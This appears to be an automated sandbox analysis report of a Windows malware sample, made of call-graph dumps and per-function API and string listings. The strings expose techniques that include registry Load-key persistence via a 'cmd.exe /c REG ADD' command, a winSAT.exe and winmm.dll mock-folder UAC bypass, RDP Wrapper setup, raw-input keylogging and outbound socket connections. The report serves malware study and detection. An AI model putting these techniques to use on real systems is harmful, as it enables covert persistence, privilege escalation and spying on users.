40773e 14557->14558 14574 405feb VirtualFree 14558->14574 14560 407756 14561 405de9 3 API calls 14560->14561 14562 407767 TerminateThread 14561->14562 14563 405de9 3 API calls 14562->14563 14564 407793 14563->14564 14564->14553 14575 4041b7 14564->14575 14567 405044 15 API calls 14568 4077f1 14567->14568 14580 40411d 14568->14580 14571 403148 2 API calls 14571->14572 14572->14553 14573->14555 14574->14560 14576 40373f 3 API calls 14575->14576 14577 4041d5 14576->14577 14583 405feb VirtualFree 14577->14583 14579 404201 14579->14567 14584 405feb VirtualFree 14580->14584 14582 40412e 14582->14571 14583->14579 14584->14582 14585->13730 14587 414c43 14586->14587 14588 414ca3 CoUninitialize 14587->14588 14588->13733 14589->13736 14590->13740 14592 414ce9 14591->14592 14604 414e3b 14591->14604 14593 414d18 14592->14593 14594 414a12 4 API calls 14592->14594 14592->14604 14595 414d21 CoCreateInstance 14593->14595 14593->14604 14594->14593 14596 414d43 14595->14596 14595->14604 14597 414492 CoTaskMemFree 14596->14597 14596->14604 14598 414e05 14597->14598 14599 414ad1 3 API calls 14598->14599 14600 414e19 14599->14600 14601 405de9 3 API calls 14600->14601 14602 414e24 14601->14602 14605 41457f 14602->14605 14604->13737 14608 414f0a 14605->14608 14611 405feb VirtualFree 14608->14611 14610 414f14 14611->14610 14648 401586 14612->14648 14617 414216 14619 414e7b 20 API calls 14617->14619 14620 414222 14617->14620 14618 402b00 14629 401325 14618->14629 14619->14620 14652 414be6 14620->14652 14621 4034d1 4 API calls 14626 414236 14621->14626 14622 4031af 10 API calls 14622->14626 14623 403549 3 API calls 14623->14626 14624 405de9 LoadLibraryA GetProcAddress ExitProcess 14624->14626 14625 40373f 3 API calls 14625->14626 14626->14618 14626->14621 14626->14622 14626->14623 14626->14624 14626->14625 14628 405feb VirtualFree 14626->14628 14658 401485 14626->14658 14628->14626 14630 401586 2 API calls 14629->14630 14633 401340 14630->14633 14631 401363 14635 40488b 14631->14635 14633->14631 14634 401485 6 API calls 14633->14634 14674 4015d3 14633->14674 14634->14633 14636 401325 12 API calls 14635->14636 14637 4048a3 14636->14637 14638 402b16 14637->14638 14639 401afa VirtualFree 14637->14639 14638->13750 14639->14638 14641 404878 14640->14641 14642 402b26 14640->14642 14643 401afa VirtualFree 14641->14643 14642->13754 14644 401afa 14642->14644 14643->14642 14645 401b0d 14644->14645 14646 401b1f 14644->14646 14645->14646 14679 405feb VirtualFree 14645->14679 14646->13754 14670 406099 GetProcessHeap HeapAlloc 14648->14670 14650 4015af 14650->14620 14651 406099 GetProcessHeap HeapAlloc 14650->14651 14651->14617 14671 406099 GetProcessHeap HeapAlloc 14652->14671 14654 414c07 14655 414c2f 14654->14655 14656 405de9 3 API calls 14654->14656 14657 402503 2 API calls 14654->14657 14655->14626 14656->14654 14657->14654 14659 40149c 14658->14659 14660 401546 14658->14660 14672 406099 GetProcessHeap HeapAlloc 14659->14672 14662 403549 3 API calls 14660->14662 14663 401562 14662->14663 14673 405feb VirtualFree 14663->14673 14665 40157f 14665->14626 14666 4014c5 14667 403549 3 API calls 14666->14667 14669 401534 14666->14669 14667->14666 14668 401afa VirtualFree 14668->14660 14669->14660 14669->14668 14670->14650 14671->14654 14672->14666 14673->14665 14675 405de9 3 API calls 14674->14675 14676 4015e8 14675->14676 14677 40373f 3 API calls 14676->14677 14678 4015f8 14677->14678 14678->14633 14679->14645 14680->13761 14681->13763 14682->13772 14684 411713 14683->14684 14684->13778 14686 4116e5 14685->14686 14687 4116d5 GetFileSize 14685->14687 14686->13778 14687->14686 14689 411673 SetFilePointer WriteFile 14688->14689 14690 41166b 14688->14690 14691 402a80 14689->14691 14692 41169f ReleaseMutex 14689->14692 14694 41178e WaitForSingleObject 14690->14694 14691->13785 14692->14691 14694->14689 14695->13798 14697 403642 14696->14697 14698 403637 PathFindExtensionW 14696->14698 14699 4036f7 4 API calls 14697->14699 14698->14697 14700 402969 14699->14700 14700->13803 14701->13806 14702->13808 14703->13812 14704->13818 14706 40373f 3 API calls 14705->14706 14707 405dc6 14706->14707 14707->13825 14724 406045 GetProcessHeap RtlAllocateHeap 14708->14724 14710 40d222 14711 403237 4 API calls 14710->14711 14712 40d237 14711->14712 14713 403237 4 API calls 14712->14713 14714 40d24a 14713->14714 14725 401f6d CreateThread 14714->14725 14716 40d265 14717 40d275 14716->14717 14718 40d26c CloseHandle 14716->14718 14726 405feb VirtualFree 14717->14726 14718->14717 14720 40d27d 14727 405feb VirtualFree 14720->14727 14722 40d285 14722->13829 14723->13831 14724->14710 14725->14716 14726->14720 14727->14722 14729 4036f7 4 API calls 14728->14729 14730 40dcd9 RegOpenKeyExW 14729->14730 14731 40dcfb 14730->14731 14752 40dd2b 14730->14752 14732 4036f7 4 API calls 14731->14732 14733 40dd0c 14732->14733 14735 412569 12 API calls 14733->14735 14734 403148 2 API calls 14736 40dd35 14734->14736 14737 40dd15 14735->14737 14792 405feb VirtualFree 14736->14792 14791 405feb VirtualFree 14737->14791 14740 40dd3d 14742 412554 RegCloseKey 14740->14742 14741 40dd1f 14743 40dd23 14741->14743 14744 40dd4b 14741->14744 14745 40dd45 14742->14745 14747 412554 RegCloseKey 14743->14747 14746 40300a 8 API calls 14744->14746 14745->13835 14745->13836 14748 40dd5c 14746->14748 14747->14752 14793 40335a lstrcmpW 14748->14793 14750 40dd63 14794 405feb VirtualFree 14750->14794 14752->14734 14753->13856 14754->13863 14755->13887 14756->13891 14758 40373f 3 API calls 14757->14758 14759 404c7b 14758->14759 14760 40373f 3 API calls 14759->14760 14761 404c86 14760->14761 14761->13928 14795 405feb VirtualFree 14762->14795 14764 404c4c 14796 405feb VirtualFree 14764->14796 14766 404c58 14767 405feb VirtualFree 14766->14767 14767->13937 14768->13879 14770 410a1f 14769->14770 14771 410a0f GetProcAddress 14769->14771 14770->13847 14771->14770 14772->13878 14773->13892 14775 40d304 14774->14775 14779 40d32b 14774->14779 14797 410a8c 14775->14797 14779->13900 14779->13901 14781 412c41 14780->14781 14782 40e528 14780->14782 14783 403333 7 API calls 14781->14783 14788 405feb VirtualFree 14782->14788 14784 412c4f 14783->14784 14785 4125df RegSetValueExW 14784->14785 14786 412c5a 14785->14786 14787 403148 2 API calls 14786->14787 14787->14782 14788->13921 14789->13933 14790->13938 14791->14741 14792->14740 14793->14750 14794->14752 14795->14764 14796->14766 14798 401052 14797->14798 14799 410ac0 AllocateAndInitializeSid 14798->14799 14800 410b10 GetLastError 14799->14800 14801 410aeb LookupAccountSidW 14799->14801 14802 410b16 14800->14802 14801->14800 14801->14802 14803 410b24 14802->14803 14804 410b1b FreeSid 14802->14804 14805 4036f7 4 API calls 14803->14805 14804->14803 14806 40d311 NetLocalGroupAddMembers 14805->14806 14807 405feb VirtualFree 14806->14807 14807->14779 14809 401fa0 TerminateThread CloseHandle 14808->14809 14810 401fb2 14808->14810 14809->14810 14811 401f6d CreateThread 14810->14811 14811->13941 14812->13951 14813->13953 14815 4056ef 14814->14815 14815->13962 14816->13970 14823 406045 GetProcessHeap RtlAllocateHeap 14817->14823 14819 415f93 14824 401f6d CreateThread 14819->14824 14821 40287d 14822 405feb VirtualFree 14821->14822 14822->13976 14823->14819 14824->14821 14828 405feb VirtualFree 14825->14828 14827 402ac4 14827->13494 14828->14827 14830 4018c7 2 API calls 14829->14830 14831 415129 14830->14831 14832 403549 3 API calls 14831->14832 14833 415135 14832->14833 14846 401fb7 14833->14846 14837 402cfe 14837->13993 14838 41514f 14838->14837 14839 401b27 VirtualFree 14838->14839 14839->14837 14841 4150e3 14840->14841 14842 4150e9 14840->14842 14843 401b27 VirtualFree 14841->14843 14853 405feb VirtualFree 14842->14853 14843->14842 14845 402d0e 14845->13997 14845->13998 14847 4018c7 2 API calls 14846->14847 14849 401fc4 14847->14849 14848 401fe9 14852 405feb VirtualFree 14848->14852 14849->14848 14850 401914 6 API calls 14849->14850 14851 4017c8 6 API calls 14849->14851 14850->14849 14851->14849 14852->14838 14853->14845 14854->14020 14866 406045 GetProcessHeap RtlAllocateHeap 14855->14866 14857 413e42 14858 403549 3 API calls 14857->14858 14859 413e77 14858->14859 14867 401f6d CreateThread 14859->14867 14861 413e87 14868 405feb VirtualFree 14861->14868 14863 40275a 14864 405feb VirtualFree 14863->14864 14864->14028 14865->14030 14866->14857 14867->14861 14868->14863 14869->14033 14870->14039 14876 410951 14871->14876 14873 4027eb 14874 405feb VirtualFree 14873->14874 14874->14051 14875->14053 14883 401085 GetProcessHeap RtlAllocateHeap 14876->14883 14878 410992 14884 401099 GetProcessHeap RtlFreeHeap 14878->14884 14879 410962 14879->14878 14880 41096d lstrcpyA CreateThread 14879->14880 14882 410998 14880->14882 14882->14873 14883->14879 14884->14882 14885->14057 14887 4124fa RegDeleteValueW 14886->14887 14888 41250b 14886->14888 14887->14888 14889 405feb VirtualFree 14888->14889 14889->14069 14919 4038e9 14920 413441 11 API calls 14919->14920 14921 403901 14920->14921 14922 403549 3 API calls 14921->14922 14923 40390b 14922->14923 14926 405feb VirtualFree 14923->14926 14925 403913 14926->14925 14968 4152fd 14969 415307 14968->14969 14970 415328 GetTempPathW lstrcatW 14969->14970 14971 4036f7 4 API calls 14970->14971 14972 41535d 14971->14972 14973 403549 3 API calls 14972->14973 14974 415365 14973->14974 14983 405feb VirtualFree 14974->14983 14976 41536d 14977 403873 7 API calls 14976->14977 14978 41538b 14977->14978 14979 40378b 8 API calls 14978->14979 14980 415392 14979->14980 14981 403777 2 API calls 14980->14981 14982 41539a 14981->14982 14983->14976 17539 41579a 17540 401052 17539->17540 17541 4157c2 SHGetFolderPathW lstrcatW 17540->17541 17542 40357c 9 API calls 17541->17542 17543 4157f8 17542->17543 17544 403873 7 API calls 17543->17544 17545 415818 17544->17545 17546 40378b 8 API calls 17545->17546 17547 41581f 17546->17547 17548 403777 2 API calls 17547->17548 17549 415827 17548->17549 17552 405feb VirtualFree 17549->17552 17551 41582f 17552->17551 17556 4157a1 17557 4157c2 SHGetFolderPathW lstrcatW 17556->17557 17558 401052 17556->17558 17559 40357c 9 API calls 17557->17559 17558->17557 17560 4157f8 17559->17560 17561 403873 7 API calls 17560->17561 17562 415818 17561->17562 17563 40378b 8 API calls 17562->17563 17564 41581f 17563->17564 17565 403777 2 API calls 17564->17565 17566 415827 17565->17566 17569 405feb VirtualFree 17566->17569 17568 41582f 17569->17568 17580 401daa 17581 401dad 17580->17581 17582 401dee 17580->17582 17589 405feb VirtualFree 17581->17589 17583 404c3b VirtualFree 17582->17583 17586 401dfd 17583->17586 17585 401dbe 17590 405feb VirtualFree 17585->17590 17588 401dc9 17589->17585 17590->17588 15099 40f6bd 15102 40f6c9 15099->15102 15101 40f7be 15102->15101 15103 40f7c7 15102->15103 15104 4022e8 2 API calls 15102->15104 15106 401085 GetProcessHeap RtlAllocateHeap 15102->15106 15105 4022e8 2 API calls 15103->15105 15104->15102 15105->15101 15106->15102

                                                                            Executed Functions

                                                                            Function 004148B6 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138comCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 282 4148b6-4148f0 CoInitialize CoCreateInstance 283 4148f6-414902 282->283 284 414a0d-414a11 282->284 285 414906-41490b 283->285 285->284 286 414911-414919 285->286 288 4149c9-4149e1 286->288 290 4149e7-4149ec 288->290 291 41491e-414937 288->291 292 4149f7-4149fc 290->292 293 4149ee-4149f4 290->293 291->290 297 41493d-41495c VariantInit 291->297 295 414a07 CoUninitialize 292->295 296 4149fe-414a04 292->296 293->292 295->284 296->295 301 414975-41497f call 406099 297->301 302 41495e-414973 297->302 306 414981-41498a call 414b6e 301->306 307 41498c 301->307 302->290 302->301 309 41498e-414997 306->309 307->309 310 4149b7-4149c7 call 402503 309->310 311 414999 309->311 310->288 313 41499b-4149b5 311->313 313->310 313->313
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 004148C5
                                                                            • CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?,?,?,?,00414EDE,?,?,?,00414222), ref: 004148E5
                                                                            • VariantInit.OLEAUT32(?), ref: 00414941
                                                                            • CoUninitialize.OLE32(?,?,?,00414EDE,?,?,?,00414222), ref: 00414A07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInitInitializeInstanceUninitializeVariant
                                                                            • String ID: "BA$Description$FriendlyName
                                                                            • API String ID: 4142528535-3217936966
                                                                            • Opcode ID: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                                                            • Instruction ID: 897dfebaec31b784598ba9d9a56bb6e289364e2dbf67f6d0e24be1ac2d118ec5
                                                                            • Opcode Fuzzy Hash: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                                                            • Instruction Fuzzy Hash: 62413E74A00245AFCB14DFA5C888DEFBBB9EFC4714B14459EE441EB250DB78DA41CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 00406048
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,77C30770,00000000,?,00405B80,00000000), ref: 0040604F
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateProcess
                                                                            • String ID:
                                                                            • API String ID: 1357844191-0
                                                                            • Opcode ID: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                                                            • Instruction ID: 8cf45ecabbe94aee1392de7f34d48094c70ab4a430d8d374c6facdf70f7c2239
                                                                            • Opcode Fuzzy Hash: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                                                            • Instruction Fuzzy Hash: C0A002715541005BDE5467A49F0DF553639B748701F0485947145C5060DBB454458776
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004154EB Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191registrystringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 0041551D
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415539
                                                                              • Part of subcall function 004134A2: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,00415553), ref: 004134CF
                                                                              • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                                                              • Part of subcall function 004134A2: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,00415553), ref: 004134F3
                                                                              • Part of subcall function 004134A2: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000,?,?,00415553), ref: 00413500
                                                                              • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                                                              • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004155A0
                                                                            • GetLastError.KERNEL32 ref: 004155AB
                                                                            • RegCreateKeyExA.KERNELBASE(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004155E5
                                                                            • RegSetValueExA.KERNELBASE(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00415604
                                                                            • RegSetValueExA.KERNELBASE(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00415619
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0041561F
                                                                            • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 0041567B
                                                                            • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 0041568E
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0041569D
                                                                              • Part of subcall function 00412F55: CloseHandle.KERNEL32(?,00000000,?,?,0040555F,?,?,00000000,00000000,?,?,?,00405909,?,00000000,00000000), ref: 00412F7F
                                                                              • Part of subcall function 00412F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                                                              • Part of subcall function 00412F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                                                              • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                                                              • Part of subcall function 00412F55: lstrcatW.KERNEL32(?,\winSAT.exe), ref: 00412FF7
                                                                              • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                                                              • Part of subcall function 00412F55: lstrcatW.KERNEL32(?,\winmm.dll), ref: 00413029
                                                                              • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                                                              • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                                                              • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                                                              • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                                                              • Part of subcall function 00412F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                                                              • Part of subcall function 00412F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                                                              • Part of subcall function 00412F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                                                              • Part of subcall function 004126DC: CopyFileW.KERNEL32(?,?,00000000,?,004176A4,?,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 0041277D
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 004120F8: CreateProcessW.KERNEL32 ref: 00412133
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004155DB
                                                                            • \Microsoft Vision\, xrefs: 00415681
                                                                            • MaxConnectionsPerServer, xrefs: 00415610
                                                                            • MaxConnectionsPer1_0Server, xrefs: 004155FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HeapModuleNameSystemWow64$AllocateChangeCountCurrentDisableErrorEventFindFolderFreeHandleLastNotificationPathReadRedirectionSizeTickVirtuallstrcpy
                                                                            • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                                                            • API String ID: 117119787-2552559493
                                                                            • Opcode ID: 2044e9e42bfc0140a5713c710f71f83a39e69364d515f229a4a0375c300a11a0
                                                                            • Instruction ID: 7326d773f6840a3835b81c51b4f2bde8360c666f101d5547bb5d37e447b5e8b5
                                                                            • Opcode Fuzzy Hash: 2044e9e42bfc0140a5713c710f71f83a39e69364d515f229a4a0375c300a11a0
                                                                            • Instruction Fuzzy Hash: 81614171408344EBD720EF61CC85EEF77B8EF94708F40492FB685921A1DB389985CB6A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004126DC Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 296fileprocessCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004109A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                                                              • Part of subcall function 00412514: RegCreateKeyExW.KERNELBASE(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,77C30770,?,?,0041270B,?,?), ref: 00412534
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,004176A4,?,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 0041277D
                                                                              • Part of subcall function 00412612: RegCreateKeyExW.ADVAPI32(77C30770,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                                                              • Part of subcall function 00412612: RegOpenKeyExW.KERNELBASE(77C30770,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                                                              • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                                                            • SHGetKnownFolderPath.SHELL32(00417570,00000000,00000000,?,?,?,?,?,00000000,77C30770,00000000), ref: 0041280A
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,:start,?,0041A074,wmic process call create '",00000000,?,?,?,:start,") do %%A,for /F "usebackq tokens=*" %%A in ("), ref: 00412928
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00410C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000,0041274C,00000000,?,?,?,?,00000000,77C30770,00000000), ref: 00410C44
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                            • WinExec.KERNEL32 ref: 00412A20
                                                                            • DeleteFileW.KERNELBASE(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,77C30770,00000000), ref: 00412A55
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                                                            • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                                                            • API String ID: 1503101065-3574166584
                                                                            • Opcode ID: 7b986919cec57919e6e62c140bfdb5272af47077f6e17906ac58f8f7dcd258af
                                                                            • Instruction ID: 79257a46d42963d1d04969a5855fdaa00e68833498fbabbc424ca4f910327048
                                                                            • Opcode Fuzzy Hash: 7b986919cec57919e6e62c140bfdb5272af47077f6e17906ac58f8f7dcd258af
                                                                            • Instruction Fuzzy Hash: 1FA12F71A0050AABCB14EF61CC92DEE7B79EF44348B00442EF502772D2DF78AA55CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040E5A3 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 121COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(0055AD18), ref: 0040E5B0
                                                                              • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,77C30770,00000000,00405B72), ref: 0040609C
                                                                              • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                                                              • Part of subcall function 004032E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                                                              • Part of subcall function 00403549: lstrcpyW.KERNEL32 ref: 0040356E
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                                                            • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                                                            • API String ID: 2811233055-3289620323
                                                                            • Opcode ID: 39239106dbb69af809a275f728310b66d98112eac81cc19e74a28374785dc611
                                                                            • Instruction ID: 6cb6bcb1a7122bfa5540acbacd22e5e8e3ff012f813de54f9fa316898c3517f8
                                                                            • Opcode Fuzzy Hash: 39239106dbb69af809a275f728310b66d98112eac81cc19e74a28374785dc611
                                                                            • Instruction Fuzzy Hash: 7F319130B0061467C718BF669C628AE2E79ABD8707710063FB5027B2E2DE7C8E45975E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040910D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • InitializeCriticalSection.KERNEL32(0055A808,?,00401251), ref: 00409138
                                                                            • LoadLibraryW.KERNEL32(User32.dll,?,00401251), ref: 00409163
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                                                            • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                                                            • API String ID: 4274177235-2474467583
                                                                            • Opcode ID: f21f6e8379296c15d73bc2c2e3701995bbe6fe40c5bb1bf2bee41da66eabdbff
                                                                            • Instruction ID: d1db26310c3b7d33376476d0bb5eea29622b7161c180695f05f3ce86934a789e
                                                                            • Opcode Fuzzy Hash: f21f6e8379296c15d73bc2c2e3701995bbe6fe40c5bb1bf2bee41da66eabdbff
                                                                            • Instruction Fuzzy Hash: 980144B16643504B8700AB697C255693EF1FB9D702310832FE90497360E73809CBDB8E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040594B Relevance: 9.1, APIs: 6, Instructions: 75networksynchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 327 40594b-4059a0 call 403237 call 41178e getaddrinfo 332 4059a2-4059bb socket 327->332 333 4059ff 327->333 332->333 334 4059bd-4059fa htons freeaddrinfo connect 332->334 335 405a01-405a0f call 405feb 333->335 336 405a12-405a21 ReleaseMutex 334->336 337 4059fc 334->337 336->335 337->333
                                                                            APIs
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                              • Part of subcall function 0041178E: WaitForSingleObject.KERNEL32(?,000000FF,00405974,77C30770,?,?,00000000,00404FB9,?,?,?,?,?,00000000,77C30770), ref: 00411792
                                                                            • getaddrinfo.WS2_32(77C30770,00000000,00404FB9,00000000), ref: 00405998
                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                                                            • htons.WS2_32(00000000), ref: 004059D5
                                                                            • freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                                                            • connect.WS2_32(?,?,00000010), ref: 004059F1
